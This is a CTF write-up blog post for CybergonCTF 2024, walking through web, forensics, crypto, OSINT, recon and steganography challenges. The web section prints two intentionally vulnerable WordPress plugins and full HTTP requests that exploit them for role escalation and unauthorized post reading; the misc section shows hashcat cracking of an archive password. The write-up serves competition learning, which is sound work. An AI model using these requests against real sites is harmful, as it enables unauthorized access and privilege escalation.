CTF WriteUps
CybergonCTF 2024
date
Dec 1, 2024
slug
CybergonCTF 2024
author
status
Public
tags
WEB
Digital Forensics
forensics
misc
CRYPTO
OSINT
Reconnaissance
FTK Imager
Autopsy
Registry Explorer
steg
mp4 steg
wav
wav steg
audio steg
Tenant ID
Tenant Name
DNS TXT Records
DNS SPF Records
steghide
corrupted image
magic bytes
summary
Some writeups of CybergonCTF2024 Challenges
type
Post
thumbnail
category
CTF WriteUps
updatedAt
Dec 23, 2024 11:44 AM
Table of Contents:
Table of Contents:Web:Cybergon Blog:Cybergon Blog 2:Digital Forensics:Warmup:Welcome - 1:Welcome - 2:Welcome - 3:Sleep Timeout:Misc:Triple Quiz:Your Favorite Song:Rules:Zip Zap:Crypto:Warm Up:Warm Up 1:Flag (Part 1):Flag (Part 2):I Love Poetry:Chill Bro:E45y p345y:OSINT:Vacation:Favorite Journal:The Stadium:The Pagoda:The Train & The Bridge:History Repeats Itself:The Statue:Reconnaissance:Validation:Uncover:Secure Life:STEGANO:Invisible:Truesight:
Web:
Cybergon Blog:

- Its a wordpress site, we are able to register a new user

- Registering as a
new user
andlogging in
- They provided a file
user-profile-enhancer.php
Analyzing the code
<?php /* Plugin Name: User Profile Enhancer Description: Adds various customization options to the user profile update functionality. Version: 1.0 Author: mgthura */ function log_user_activity($user_id) { error_log("User ID {$user_id} updated their profile."); } function add_custom_profile_field($user) { echo '<h3>Custom Profile Settings</h3>'; echo '<table class="form-table"><tr>'; echo '<th><label for="custom_field">Custom Field</label></th>'; echo '<td><input type="text" name="custom_field" id="custom_field" value="" class="regular-text"></td>'; echo '</tr></table>'; } add_action('show_user_profile', 'add_custom_profile_field'); add_action('edit_user_profile', 'add_custom_profile_field'); function process_custom_profile_field($user_id) { if (isset($_POST['custom_field'])) { update_user_meta($user_id, 'custom_field', sanitize_text_field($_POST['custom_field'])); } } add_action('personal_options_update', 'process_custom_profile_field'); add_action('edit_user_profile_update', 'process_custom_profile_field'); function custom_admin_notice() { echo '<div class="notice notice-info"><p>Profile customization plugin is active!</p></div>'; } add_action('admin_notices', 'custom_admin_notice'); function add_custom_capability_to_admin() { $admin = get_role('administrator'); if ($admin && !$admin->has_cap('customize_theme')) { $admin->add_cap('customize_theme'); } } add_action('admin_init', 'add_custom_capability_to_admin'); function update_dummy_option() { update_option('dummy_option', time()); } add_action('admin_init', 'update_dummy_option'); function dummy_shortcode_function($atts) { return '<p>Dummy shortcode output!</p>'; } add_shortcode('dummy_shortcode', 'dummy_shortcode_function'); function display_user_role_in_footer() { if (is_admin() && current_user_can('read')) { $current_user = wp_get_current_user(); echo '<p style="text-align:center;">Your Role: ' . esc_html(implode(', ', $current_user->roles)) . '</p>'; } } add_action('admin_footer', 'display_user_role_in_footer'); function custom_profile_update_hook($user_id) { if (isset($_POST['custom_option']) && is_array($_POST['custom_option']) && in_array('0', $_POST['custom_option'])) { $user = get_user_by('id', $user_id); $user->set_role('contributor'); } } add_action('personal_options_update', 'custom_profile_update_hook'); add_action('edit_user_profile_update', 'custom_profile_update_hook'); function update_user_last_login($user_login, $user) { update_user_meta($user->ID, 'last_login', current_time('mysql')); } add_action('wp_login', 'update_user_last_login', 10, 2); function debug_user_data() { if (isset($_GET['debug_user'])) { $user = wp_get_current_user(); error_log(print_r($user, true)); } } add_action('admin_init', 'debug_user_data');
- The
add_custom_capability_to_admin
function, adds acustomize_theme
when the role isadministrator
function add_custom_capability_to_admin() { $admin = get_role('administrator'); if ($admin && !$admin->has_cap('customize_theme')) { $admin->add_cap('customize_theme'); } }
- The below code, handles the
update profile
of user
function custom_profile_update_hook($user_id) { if (isset($_POST['custom_option']) && is_array($_POST['custom_option']) && in_array('0', $_POST['custom_option'])) { $user = get_user_by('id', $user_id); $user->set_role('contributor'); } }
- Tryiing to update the
custom field
from theprofile

- Seeing the request in
burp
POST /wp-admin/profile.php HTTP/1.1 Host: 46.250.232.141:8081 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://46.250.232.141:8081/wp-admin/profile.php Content-Type: application/x-www-form-urlencoded Content-Length: 332 Origin: http://46.250.232.141:8081 DNT: 1 Connection: keep-alive Cookie: wordpress_aa3b0865494c08b9d4423e0b770d29b0=test%7C1733244407%7C2ADQWsziUOPzk36lQxfB1YEm1rS02LSuSsfCyOBBmLq%7C95a67175782654747e162b9a668f9db5cdb75f16466721e7d3c99ab0f7e54fb6; wordpress_ab6bf97384b852c21c54e3ac3d637df9=test%7C1734286002%7CZ26P2AZH3xl5ETC8QbIUN7AGpxLPVSOBRqrjbK7CHkh%7Ca2648879fd1a9897c1c50011ba539e88af2f8d899a7e157cdd1c68e2327de08f; wp-settings-time-6=1732974878; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-time-4=1733071608; wordpress_logged_in_aa3b0865494c08b9d4423e0b770d29b0=test%7C1733244407%7C2ADQWsziUOPzk36lQxfB1YEm1rS02LSuSsfCyOBBmLq%7C49d8df2366f64722241583bc182606783c3340d9cff0837643f2c109af46fa2f; wp_lang=en_US; wp-settings-time-2=1733076405; wordpress_logged_in_ab6bf97384b852c21c54e3ac3d637df9=test%7C1734286002%7CZ26P2AZH3xl5ETC8QbIUN7AGpxLPVSOBRqrjbK7CHkh%7C5cfa3c473aff3e0a8444f4931055a0667567c164c9415e56ba6c0a0af8e0d422 Upgrade-Insecure-Requests: 1 Priority: u=0, i _wpnonce=c53780692f&_wp_http_referer=%2Fwp-admin%2Fprofile.php&from=profile&checkuser_id=2&color-nonce=4d14849248&admin_color=fresh&admin_bar_front=1&user_login=test&first_name=&last_name=&nickname=test&display_name=test&email=&url=&description=&pass1=&pass2=&custom_field=administrator&action=update&user_id=2&submit=Update+Profile
- This doesnβt have
custom_option
argument as per the check,,..
function custom_profile_update_hook($user_id) { if (isset($_POST['custom_option']) && is_array($_POST['custom_option']) && in_array('0', $_POST['custom_option'])) { $user = get_user_by('id', $user_id); $user->set_role('contributor'); } }
- We need to add
custom_option
argument array with value with0
custom_field=administrator&custom_option[]=0
- After sending the request going back to the home page we got the
flag
http://46.250.232.141:8081/

- The flag is
CYBERGON_CTF2024{w0rdpr3ss_vUlN_1s_FuN_4nd_3asy}
Cybergon Blog 2:

- The application is very similar to
Cybergon Blog1
- Review the new file that they provided
user-post-enhancer.php
<?php /* Plugin Name: User Post Enhancer Description: A plugin to enhance user posts with additional functionality. Version: 1.0 Author: mgthura */ if (!defined('ABSPATH')) { exit; // Exit if accessed directly } class CustomUserActions { public function __construct() { add_action('init', [$this, 'register_ajax_actions']); add_action('wp_enqueue_scripts', [$this, 'enqueue_scripts']); add_action('wp_ajax_generate_nonce', [$this, 'generate_nonce']); add_action('wp_ajax_nopriv_generate_nonce', [$this, 'generate_nonce']); add_action('wp_ajax_read_post_data', [$this, 'read_post_data']); add_action('wp_ajax_read_post', [$this, 'read_post']); add_action('wp_ajax_update_user_preferences', [$this, 'update_user_preferences']); add_action('wp_ajax_fetch_user_settings', [$this, 'fetch_user_settings']); add_action('wp_ajax_get_recent_posts', [$this, 'get_recent_posts']); add_action('wp_ajax_submit_feedback', [$this, 'submit_feedback']); add_action('wp_ajax_update_avatar', [$this, 'update_avatar']); add_action('wp_ajax_fetch_api_data', [$this, 'fetch_api_data']); add_action('wp_ajax_review_security_policies', [$this, 'review_security_policies']); add_action('wp_ajax_sync_server', [$this, 'sync_server']); add_action('wp_ajax_process_shortcode', [$this, 'process_shortcode']); add_action('wp_ajax_execute_background_task', [$this, 'execute_background_task']); } public function generate_nonce() { if (is_admin()) { $nonce = wp_create_nonce('read_post_data_nonce'); wp_send_json_success(['nonce' => $nonce]); } else { wp_send_json_error(['message' => 'Unauthorized']); } } public function read_post() { $post_id = isset($_POST['post_id']) ? intval($_POST['post_id']) : 0; $post = get_post($post_id); if ($post && $post->post_status === 'publish') { wp_send_json_success(['post_data' => [ 'title' => $post->post_title, 'content' => $post->post_content, ]]); } else { wp_send_json_error(['message' => 'Post not found or not published']); } } public function read_post_data() { check_ajax_referer('read_post_data_nonce', 'nonce'); $post_id = isset($_POST['post_id']) ? intval($_POST['post_id']) : 0; $post = get_post($post_id); if (is_admin() && $post) { wp_send_json_success(['post_data' => [ 'title' => $post->post_title, 'content' => $post->post_content, ]]); } else { wp_send_json_error(['message' => 'Unauthorized or post not found']); } } public function update_user_preferences() { $user_id = get_current_user_id(); $prefs = ['theme' => 'light', 'notifications' => 'enabled', 'language' => 'en']; $updated = update_user_meta($user_id, 'preferences', $prefs); if ($updated) { wp_send_json_success(['message' => 'Preferences updated.', 'preferences' => $prefs]); } else { wp_send_json_error(['message' => 'Failed to update preferences.']); } } public function fetch_user_settings() { $user_id = get_current_user_id(); $settings = [ 'email' => wp_get_current_user()->user_email, 'timezone' => get_option('timezone_string', 'UTC'), ]; if (!empty($settings)) { wp_send_json_success(['message' => 'Settings fetched successfully.', 'settings' => $settings]); } else { wp_send_json_error(['message' => 'Failed to fetch settings.']); } } public function get_recent_posts() { $posts = get_posts(['numberposts' => 5, 'post_status' => 'publish']); $data = array_map(function ($post) { return ['title' => $post->post_title, 'id' => $post->ID]; }, $posts); if ($data) { wp_send_json_success(['message' => 'Recent posts retrieved.', 'posts' => $data]); } else { wp_send_json_error(['message' => 'No posts available.']); } } public function submit_feedback() { $feedback = isset($_POST['feedback']) ? sanitize_text_field($_POST['feedback']) : ''; $feedback_id = wp_insert_post([ 'post_title' => 'User Feedback', 'post_content' => $feedback, 'post_status' => 'pending', 'post_type' => 'feedback', ]); if ($feedback_id) { wp_send_json_success(['message' => 'Feedback submitted successfully.', 'id' => $feedback_id]); } else { wp_send_json_error(['message' => 'Failed to submit feedback.']); } } public function update_avatar() { $avatar_id = isset($_POST['avatar_id']) ? intval($_POST['avatar_id']) : 0; $user_id = get_current_user_id(); if ($avatar_id && $user_id) { update_user_meta($user_id, 'avatar', $avatar_id); wp_send_json_success(['message' => 'Avatar updated.', 'avatar_id' => $avatar_id]); } else { wp_send_json_error(['message' => 'Invalid avatar or user.']); } } public function fetch_api_data() { $api_url = 'https://catfact.ninja/fact'; $response = wp_remote_get($api_url); $body = wp_remote_retrieve_body($response); if ($body) { wp_send_json_success(['message' => 'Data fetched from API.', 'data' => json_decode($body)]); } else { wp_send_json_error(['message' => 'Failed to fetch data from API.']); } } public function review_security_policies() { wp_send_json_success(['message' => 'Security policies reviewed.']); } public function sync_server() { wp_send_json_success(['message' => 'Server synchronization complete.']); } public function process_shortcode() { wp_send_json_success(['message' => 'Shortcode processed.', 'shortcode' => '[example_shortcode]']); } public function execute_background_task() { wp_send_json_success(['message' => 'Background task completed.']); } } new CustomUserActions();
- This function is used to read posts using
id
public function read_post_data() { check_ajax_referer('read_post_data_nonce', 'nonce'); $post_id = isset($_POST['post_id']) ? intval($_POST['post_id']) : 0; $post = get_post($post_id); if (is_admin() && $post) { wp_send_json_success(['post_data' => [ 'title' => $post->post_title, 'content' => $post->post_content, ]]); } else { wp_send_json_error(['message' => 'Unauthorized or post not found']); } }
- Note that it gets the
nonce
and checks it so we need to generate the nonce
- If we check the code, there is a function to generate nonce
public function generate_nonce() { if (is_admin()) { $nonce = wp_create_nonce('read_post_data_nonce'); wp_send_json_success(['nonce' => $nonce]); } else { wp_send_json_error(['message' => 'Unauthorized']); } }
- First register and login as a user and login as the user
- Now we have to generate
nonce
using the actiongenerate_nonce
http://46.250.232.141:8082/wp-admin/admin-ajax.php?action=generate_nonce

- Using the
generated nonce
now we can access any post using the actionread_post_data
POST /wp-admin/admin-ajax.php?action=read_post_data HTTP/1.1 Host: 46.250.232.141:8082 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: keep-alive Cookie: wordpress_ab6bf97384b852c21c54e3ac3d637df9=test%7C1734280291%7CtMiiCL9dcuPcej4M8L8hcroZaUhYSGXF27sY5JpWYdP%7Cd6ba930c8d686559be7b8a6af8db427ead1c200596db02d69489ad05855cc080; wordpress_aa3b0865494c08b9d4423e0b770d29b0=test%7C1733244407%7C2ADQWsziUOPzk36lQxfB1YEm1rS02LSuSsfCyOBBmLq%7C95a67175782654747e162b9a668f9db5cdb75f16466721e7d3c99ab0f7e54fb6; wp-settings-time-6=1732974878; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-time-4=1733071608; wordpress_logged_in_ab6bf97384b852c21c54e3ac3d637df9=test%7C1734280291%7CtMiiCL9dcuPcej4M8L8hcroZaUhYSGXF27sY5JpWYdP%7C0b77f681720f52823e284e72140abd18bbc85eaa84de7fd7b005439db5d956c9; wp-settings-time-2=1733070777; wordpress_logged_in_aa3b0865494c08b9d4423e0b770d29b0=test%7C1733244407%7C2ADQWsziUOPzk36lQxfB1YEm1rS02LSuSsfCyOBBmLq%7C49d8df2366f64722241583bc182606783c3340d9cff0837643f2c109af46fa2f Upgrade-Insecure-Requests: 1 Priority: u=0, i Content-Type: application/x-www-form-urlencoded Content-Length: 26 nonce=34126cec0f&post_id=5

- The flag is
CYBERGON_CTF2024{W0rdPr3ss_1s_FuN_W4s_1t?}
Digital Forensics:
- I got 15 segments of
.E01
.E02
.. files.. So I usedFTK Imager
to merge the files
- You can watch this video just incase β click here
Warmup:

- Extracting
hives
from the below location usingautopsy
C:\Windows\System32\config\
- Then using
Registry Explorer
to view theRegistry View
- Researching and found that we can get the
Timezone
from the below registry
SYSTEM\ControlSet001\Control\TimeZoneInformation

- We got the
time zone
as Singapore Standard Time and thebias -480
Indicates the timezone offset in minutes from UTC
CYBERGON_CTF2024{UTC+08:00 Singapore Standard Time}
- But for some reason, I was not getting the right flag, checking my
timezone setting
I found the right fortmat

CYBERGON_CTF2024{UTC+08:00 Kuala Lumpur, Singapore}
Welcome - 1:

- Opening the
Solid
whole image inautopsy
and running all the modules
- Just clicking the data source, under
Data Artifacts
We got theDevice Name
andDevice Owner's Name

- The final flag is
CYBERGON_CTF2024{White-Party, SEAN JOHN COMBS}
Welcome - 2:

- In
autopsy
I was checking on theWeb Cookies
and foundc_user
value.. It is auserID

- Now we need to find
Bio status
- We can view the
facebook profile
withc_user
https://www.facebook.com/profile.php?id=61567849079733

- We got the bio as
East Coast Rapper
- The final flag is
CYBERGON_CTF2024{61567849079733, East Coast Rapper}
Welcome - 3:

- When browsing around the
autopsy
and clicking around different files. I found the details ofOS Account

- The final flag is
CYBERGON_CTF2024{Ko Toke Gyi}
Sleep Timeout:

- After lot of researching and study, I found the registry where it saves the
Sleep Power Settings
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Power\PowerSettings\238C9FA8-0AAD-41ED-83F4-97BE242C8F20
- Using
Registry Explorer
to browse the hive,System standby timeout

- We need to find the
Active Setting
- To find the
ActivePowerScheme
We need to check the below registry
SYSTEM\ControlSet001\Control\Power\User\PowerSchemes

- We can see the
active power scheme
which isBalanced (recommended)

- Now we can get the values
DCSettingIndex
andACSettingIndex
- The
DCSettingIndex
is when battery is used andACSettingIndex
is when plugged in

- Now we need to convert this to
seconds
- The final flag is
CYBERGON_CTF2024{300, 60}
Misc:
Triple Quiz:

- Its a
rar
file and it asked for a password so we need to crack it first
- Converting the
rar
tohash
rar2john Triple_Quiz.rar > hash
- Using
hashcat
with wordlistrockyou.txt
to crack it
hashcat hash rockyou.txt
- We got the password as
ICEMAN

- Now, we get a
.wav
file, listing it, it looks likemorse code
- So we need to convert from
morse audio
using this online tool

- We got these values
6 666 777 7777 33 9 444 8 44 8 66 444 66 33
- Now using cipher-identifier to identify the cipher, we got
Multi-tap Phone (SMS)
- Using that to decode, we got the flag

- The final flag is
CYBERGON_CTF2024{MORSEWITHTNINE}
Your Favorite Song:

- We got a
mp4
file
- Opening and playing it, its
APT APT song by bruno mars and rose
- So according to the description, the password is
apartment
- Trying to
extract
usingbinwalk
binwalk -e song.mp4
- Moving into the directory we are able to find
zip
file
- Now extracting it with the password
apartment
- We got
metadata.txt
which had the flag

- The flag is
CYBERGON_CTF2024{Y0u_g07_r053}
Rules:

- The first part of the flag we got from the
discord rules
channel

- Decoding that we get
Flag Part1 > d1sc0rd_

- The second part of the flag we got from the
rules
page from the website

Flag Part2 > p0rt4l
- The third part we got it from the cybergon blog page

- The final flag is
CYBERGON_CTF2024{d1sc0rd_p0rt4l_w3b}
Zip Zap:

- It is zipped 500 times
- Each time the password will be in the filename inside the zip file

- In this case the
'
is the password, It will go on
- Since the password changes each time, we anyways need to script it
import os import subprocess import re import sys # Initial ZIP file to start with current_zip = "487. This is the password - b.zip" while os.path.isfile(current_zip): print(f"Processing: {current_zip}") try: # List the contents of the current ZIP file result = subprocess.run(["7z", "l", current_zip], capture_output=True, text=True) if result.returncode != 0: print(f"Error: Failed to list contents of {current_zip}. Exiting.") sys.exit(1) # Extract all the inner file names from the 7z output inner_files = re.findall(r"(\d+\. This is the password - .+\.zip)", result.stdout) if not inner_files: print(f"Error: Could not find any inner files in {current_zip}. Exiting.") sys.exit(1) # Select the last inner file (which should be the next ZIP file) inner_file = inner_files[-1] # Take the last match print(f"Inner file: {inner_file}") # Extract the password from the inner file name password_match = re.search(r"(?<=This is the password - )(.*?)\.zip", inner_file) if not password_match: print(f"Error: Could not extract the password from {inner_file}. Exiting.") sys.exit(1) password = password_match.group(1) # Extract the matched password print(f"Password: {password}") # Extract the current ZIP file using the password print(f"Extracting {current_zip} with password: {password}") result = subprocess.run(["7z", "x", current_zip, f"-p{password}"], capture_output=True, text=True) if result.returncode != 0: print(f"Error: Extraction failed for {current_zip} with password: {password}. Exiting.") print(result.stderr) sys.exit(1) # Update the current ZIP file for the next iteration current_zip = inner_file print(f"Next file to process: {current_zip}") except Exception as e: print(f"An unexpected error occurred: {e}") sys.exit(1) print("All ZIP files have been successfully processed!")
- At last we got the flag!

- Yo, but
WTF!
- Asking the support they say to analyze better
- Then I found out that the some of the
password characters
are the password

ls | awk -F '- ' '{print $2}' | sed 's/.zip$//' | tr -d '\n'
- We used the above command to get the flag

CYBERGON_CTF2024{y0U_g07_r341_F14g}
Crypto:
Warm Up:

- We got
1
and0
s

- Trying to use
magic tool
from cyberchef

- Then use the
From_Binary('Space') and From_Hex('Space')
and putting in cipher-identifier and trying one by one eachresult

- We got the flag when we used
Base 92
encoding
CYBERGON_CTF2024{b45392_h3x_b1n4ry}

Warm Up 1:

- Here, the first part is
brain fuck
and the second part iswhitespace

Flag (Part 1):
- Confirming the encodings using cipher-identifier for part 1 flag

- Trying to decode using
brainfuck
we got the first part of the flag
br41nfuck_0r_

Flag (Part 2):
- Confirming the encodings using cipher-identifier for part 2 flag

- Trying to decode using
whitespace
we got the second part of the flag
wh1t35p4c3?

- The final flag is
CYBERGON_CTF2024{br41nfuck_0r_wh1t35p4c3?}
I Love Poetry:

- I am able to see the poem, with some encoded string at the end

- Using cyberchef to decode the encoding, its actually
base64
and we get this
11:1 14:7 1:3 1:4 7:5 14:2 3:3

- After further analzying, its the
line
and theword
from thepoem
- I got the final flag
CYBERGON_CTF2024{Haveyoueverheardthepoemcipher}
Chill Bro:

- We got this image

- After some search we found that it is Dancing men cipher
- We got the flag

CYBERGON_CTF2024{TAKEABREAKBROLETSDANCE}
E45y p345y:

- Identified its
Rail Fence Cipher
- Using Cyberchef to decode it, trying different key and adjusting the offset we got the flag

CYBERGON_CTF2024{R4!1_f3Nc3_C!pH3r_KrUb}
OSINT:
Vacation:

- They have provided with an image
- Google reverse image searching it

- One of the image looks similar, so searching the place
muong thanh bai chay hotel
- But the flag was not correct, but I was pretty sure the place was
Ha Long, Vietnam
- Through further osint I found this
- The final flag is
CYBERGON_CTF2024{Muong Thanh Luxury Ha Long Centre Hotel, Ha Long, Vietnam}
Favorite Journal:

- We got this image

- After some reverse image searching I found name of the journal..
Shwe Thway
- The publised date is
4-1-1969
- printing house is
Sarpay Beikman

- translated it from burmese to english

- Found it from the last page
CYBERGON_CTF2024{4-1-69_0032}
The Stadium:

- We got this image

- Reverse image searching we found its
centre bell
- But the other details were wrong, we know its centre bell from canada
- Searching in google
hockey stadium in canada
we got this wiki
- Which gave all the info

- The final flag is
CYBERGON_CTF2024{Montreal_Quebec_21700_1996}
The Pagoda:

- Reverse image searching

- locate the ananda temple donation center's position

- Use dcode to get the what3words approx location..


- Take the top left corner of the donation centre

- Then to find the
Buddhas
we used this wiki

- We got the flag
CYBERGON_CTF2024{doorstops.overthrows.folder_4_Gautama_Kakusandha_Kassapa_Konagamana}
The Train & The Bridge:

- We got this image

- Reverse image searching we got this

- We found the built year which is
1969
- Then we got a video

- Reverse searching we found its
Goteik Viaduct

- After further osint we found the video on youtube
- Bridge video published:
9 May 2019
- The final flag is
CYBERGON_CTF2024{1969_gokteik_09-05-2019}
History Repeats Itself:

- We got this image

- Reverse image searching we found this resource
- This disclosed the year when it happened
- Finally we got the flag
CYBERGON_CTF2024{February_12_1947}
The Statue:

- They have provided with the image
- Reverse image searching we got this

- Searching in the map, we got the coordinates

- The final flag is
CYBERGON_CTF2024{22.0804, 95.2893}
Reconnaissance:
Validation:

- We got the
TXT
records, using this DNS TXT Records

- Note, TXT records might also contain SPF records, we also need to include it
- We got
SPF
records, using this DNS SPF records

Uncover:

- We got the
Tenant ID
From here gettenantpartitionweb but it was no use

- Further researching, we got azure-osint
- This gave us the
tenant name

CYBERGON_CTF2024{goddamnit2024.onmicrosoft.com}
Secure Life:

- We have given a
certficate.der
file
- We see the information about the certificate using
openssl
openssl x509 -in certificate.der -text

- Therefore the flag is
CYBERGON_CTF2024{2039:11:24:20:38:00}
STEGANO:
Invisible:

- We got an image, uploading in aperisolve

- We got some common passwords
null winteriscoming getyourflag winteriscominggetyourflag
- Using steghide and trying to extract files using the gained passwords
steghide extract -sf challenge1.jpg -p getyourflag

- We got the flag
CYBERGON_CTF2024{n07h1ng_5t4ys_h1dd3n}
Truesight:

- The image could not be opened, might be corruped, opening it in hexedit
- The magic bytes are missing, so inserting
8 bytes
to add the magic bytes

- Adding the magic bytes accordingly for
png
89 50 4E 47 0D 0A 1A 0A

- Then downloading the file we got the flag

- The flag is
CYBERGON_CTF2024{y0u_g07_7h3_r!gh7_s1gn5}